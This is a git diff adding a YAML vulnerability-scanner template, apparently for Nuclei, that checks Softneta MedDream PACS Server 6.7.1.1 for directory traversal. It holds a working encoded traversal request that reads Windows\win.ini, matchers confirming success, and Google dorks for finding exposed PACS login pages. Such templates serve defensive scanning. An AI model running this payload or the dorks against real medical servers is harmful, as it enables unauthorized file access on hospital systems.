diff --git a/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml new file mode 100644 index 0000000000..88c4402fbb --- /dev/null +++ b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -0,0 +1,27 @@ +id: sofneta-mecdream-pacs-lfi + +info: + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + author: 0x_akoko + severity: high + description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + reference: + - https://www.exploit-db.com/exploits/45347 + - https://www.softneta.com/products/meddream-pacs-server/downloads.html + metadata: + google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login + tags: sofneta,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and